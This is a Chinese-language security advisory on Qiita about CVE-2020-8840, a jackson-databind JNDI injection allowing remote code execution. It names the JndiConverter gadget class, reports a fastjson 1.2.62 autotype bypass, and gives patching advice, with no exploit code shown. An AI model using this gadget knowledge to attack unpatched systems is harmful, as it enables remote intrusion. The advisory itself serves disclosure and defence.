Help us understand the problem. What is going on with this article?

[漏洞通告]CVE-2020-8840/jackson-databind JNDI注入导致远程代码执行

漏洞描述

近日,亚信安全网络攻防实验室跟踪到jackson-databind更新了jndi注入的黑名单类,并发布了新版本,版本号为2.8.11.5.如果在项目包中存在该类的jar包且JDK版本满足注入版本,则可以使用JNDI注入的方式导致远程代码执行

漏洞编号

CVE-2020-8840

漏洞威胁等级

中危

不受影响范围

2.8.11.5

漏洞验证

这里选用2.10.1这个较新的版本

image.png

主要增加了org.apache.xbean.propertyeditor.JndiConverter这个类

说到jackson-databind,我们就会想起阿里巴巴开源的fastjson

随即使用这个类对fastjson进行JNDI注入尝试

image.png

成功在开启autotype的情况下,bypass fastjson 1.2.62(最新版)

修复建议

  • 1.更新到最新版本
  • 2.使用高版本JDK

时间轴

[0] 2020/02/19 NVD发布安全通告
[1] 2020/02/21 亚信安全网络攻防实验室分析&复现该漏洞并发布漏洞通告

Reference

https://nvd.nist.gov/vuln/detail/CVE-2020-8840

Why not register and get more from Qiita?
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
Comments
No comments
Sign up for free and join this conversation.
If you already have a Qiita account
Why do not you register as a user and use Qiita more conveniently?
You need to log in to use this function. Qiita can be used more conveniently after logging in.
You seem to be reading articles frequently this month. Qiita can be used more conveniently after logging in.
  1. We will deliver articles that match you
    By following users and tags, you can catch up information on technical fields that you are interested in as a whole
  2. you can read useful information later efficiently
    By "stocking" the articles you like, you can search right away
ユーザーは見つかりませんでした